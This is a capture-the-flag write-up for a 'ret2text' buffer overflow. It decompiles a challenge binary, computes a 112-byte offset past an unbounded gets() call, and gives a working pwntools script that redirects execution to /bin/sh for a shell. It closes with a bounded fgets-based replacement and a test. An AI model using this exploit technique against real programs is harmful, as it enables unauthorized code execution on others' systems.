Original article: https://www.dazhuanlan.com/2019/08/25/5d622cf80cbe3/
Check the basic information about the program
NX is enabled, which means data on the stack is not executable
Run the program to see how it behaves
The program has only one input point. Load the program into IDA:
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+1Ch] [ebp-64h]

  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("There is something amazing here, do you know anything?");
  gets(&s);
  printf("Maybe I will tell you next time !");
  return 0;
}
The gets function places no limit on the input length, so the return address can be overwritten. Next we calculate the offset from the gets buffer to the return address
You can see the address is 0x62616164; from it we calculate the number of bytes we need to fill
112 padding characters need to be filled
Next we check in IDA whether /bin/sh is present
/bin/sh is present at address 0x0804863A
Then write the exploit script
from pwn import *

p = process("./ret2text")
# Wait for the prompt printed by puts()
p.recvuntil(b'anything?\n')
# 112 bytes of padding, then the new return address
p.sendline(b'a' * 112 + p32(0x0804863A))
p.interactive()
Shell access was obtained successfully
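The root cause of this exercise is the unbounded gets(&s) call. As an added example (not part of the original write-up), here is a bounded reader that could replace it. The names read_line, try_input and BUF_SIZE are hypothetical, and the 100-byte buffer size is an assumption based on the ebp-64h slot IDA reports for s.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 100  /* assumption: size of s, from the ebp-64h slot */

/* Bounded replacement for gets(): reads one line into buf (cap bytes).
 * Returns the line length, -1 on EOF/error, or -2 if the line did not
 * fit; in that case the rest of the line is discarded and buf emptied. */
int read_line(FILE *in, char *buf, size_t cap)
{
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';          /* whole line fit: strip newline */
        return (int)(len - 1);
    }
    if (len < cap - 1)                /* short last line, no newline */
        return (int)len;
    int c = fgetc(in);                /* buffer full: is more pending? */
    if (c == '\n' || c == EOF)
        return (int)len;
    while ((c = fgetc(in)) != '\n' && c != EOF)
        ;                             /* drain the over-long line */
    buf[0] = '\0';
    return -2;
}

/* Feeds a constructed line of n 'a' bytes through read_line. */
int try_input(size_t n)
{
    char s[BUF_SIZE];
    FILE *in = tmpfile();
    if (in == NULL) return -1;
    for (size_t i = 0; i < n; i++) fputc('a', in);
    fputc('\n', in);
    rewind(in);
    int rc = read_line(in, s, sizeof s);
    fclose(in);
    return rc;
}

int main(void)
{
    printf("50 bytes  -> %d\n", try_input(50));
    printf("116 bytes -> %d\n", try_input(116)); /* 112 padding + 4 bytes */
    return 0;
}
```

With this reader, the 116-byte line used above is rejected instead of being written past the end of s.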